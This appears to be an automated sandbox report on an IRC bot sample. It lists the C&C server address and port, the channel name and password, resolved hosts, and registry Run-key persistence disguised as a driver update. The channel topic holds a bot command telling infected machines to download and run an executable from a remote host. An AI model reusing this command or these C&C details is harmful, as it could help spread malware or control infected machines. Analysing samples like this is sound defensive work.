vs.barmy-army.net(Value,Virus,Dee bunch of lamers with big botnet estimation 30k)

vs.barmy-army.net     203.141.249.71
0     127.0.0.1
www.nodrugs.kz    
www.nodrugs.kz     80.92.200.94
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1096
Send Datagram: 93 packet(s) of size 1
Recv Datagram: 93 packet(s) of size 1
Download URLs
http://80.92.200.94/images/ms.exe (www.nodrugs.kz)

C&C Server: 203.141.249.71:9595
Server Password:
Username: VirUs
Nickname: {NOVY}[DEU][XP-SP3]393457
Channel: #Us-D33# (Password: jessica)
Channeltopic: :!NAZEL http://www.nodrugs.kz/images/ms.exe ddsds.exe 1
Outgoing connection to remote server: www.nodrugs.kz TCP port 80

Resolved : vs.barmy-army.net To 67.159.2.111
Resolved : vs.barmy-army.net To 195.22.37.163
Resolved : vs.barmy-army.net To 203.141.249.71
Resolved : vs.barmy-army.net To 208.125.38.183
Resolved : vs.barmy-army.net To 93.62.62.208
Resolved : vs.barmy-army.net To 213.11.137.67
Resolved : vs.barmy-army.net To 139.91.102.101
Resolved : vs.barmy-army.net To 188.65.49.11
Resolved : vs.barmy-army.net To 137.229.242.129

Registry Changes by all processes
Create or Open   
Changes     HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Microsoft Driver Update 3” = C:DOKUME~1ADMINI~1LOKALE~1TempVAD33.exe
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Microsoft Driver Update 3” = C:DOKUME~1ADMINI~1LOKALE~1TempVAD33.exe
Reads     HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
HKEY_CURRENT_USERSoftwareMicrosoftVisual Basic6.0 “AllowUnsafeObjectPassing”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_CURRENT_USERSoftwareMicrosoftVisual Basic6.0 “AllowUnsafeObjectPassing”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSession ManagerAppCompatibility “DisableAppCompat”
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{56F9679E-7826-4C84-81F3-532071A8BCC5}InprocServer32 “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlersFile “ProgID”
HKEY_LOCAL_MACHINESOFTWAREClassesfile “ShellFolder”
HKEY_LOCAL_MACHINESOFTWAREClassesMapi “ShellFolder”
HKEY_LOCAL_MACHINESOFTWAREClassesOutlookexpress “ShellFolder”
HKEY_LOCAL_MACHINESOFTWAREClassesOTFS “ShellFolder”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersDefault “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersDefault “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersDefault “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersDefault “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.bmp “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.bmp “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.bmp “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.bmp “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.c “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.c “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.c “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.c “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cpp “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cpp “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cpp “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cpp “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cs “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cs “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cs “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cs “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cxx “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cxx “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cxx “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.cxx “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.doc “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.doc “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.doc “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.doc “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.dot “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.dot “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.dot “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.dot “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.emf “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.emf “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.emf “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.emf “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.eml “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.eml “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.eml “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.eml “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.err “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.err “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.err “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.err “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.gif “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.gif “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.gif “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.gif “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.h “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.h “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.h “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.h “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.htm “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.htm “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.htm “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.htm “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.html “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.html “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.html “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.html “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.hxx “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.hxx “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.hxx “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.hxx “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.idl “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.idl “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.idl “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.idl “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jpeg “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jpeg “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jpeg “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jpeg “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jpg “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jpg “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jpg “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jpg “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jsl “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jsl “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jsl “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.jsl “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.mht “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.mht “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.mht “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.mht “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.mhtml “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.mhtml “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.mhtml “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.mhtml “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.nws “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.nws “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.nws “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.nws “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pdf “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pdf “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pdf “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pdf “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.png “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.png “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.png “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.png “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pot “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pot “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pot “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pot “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pps “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pps “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pps “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.pps “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.ppt “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.ppt “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.ppt “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.ppt “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.rtf “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.rtf “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.rtf “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.rtf “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.txt “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.txt “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.txt “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.txt “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.vb “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.vb “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.vb “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.vb “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.wmf “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.wmf “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.wmf “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.wmf “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.wrn “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.wrn “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.wrn “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.wrn “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xls “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xls “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xls “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xls “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xlt “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xlt “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xlt “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xlt “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xml “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xml “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xml “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xml “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xsd “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xsd “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xsd “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersExtension.xsd “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecalendar “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecalendar “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecalendar “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecalendar “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecommunications “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecommunications “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecommunications “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecommunications “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecontact “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecontact “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecontact “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypecontact “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypedocument “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypedocument “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypedocument “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypedocument “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeemail “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeemail “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeemail “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeemail “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypefavorite “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypefavorite “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypefavorite “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypefavorite “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypefolder “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypefolder “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypefolder “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypefolder “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeim “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeim “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeim “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeim “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeimages “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeimages “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeimages “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeimages “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypemusic “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypemusic “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypemusic “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypemusic “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypenote “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypenote “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypenote “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypenote “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypepicture “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypepicture “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypepicture “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypepicture “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypepresentation “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypepresentation “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypepresentation “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypepresentation “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeprogram “”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeprogram “ContentType”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeprogram “TemplateUrl”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypeprogram “ScriptOk”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows Desktop SearchPreviewersPerceivedTypespreadsheet “”
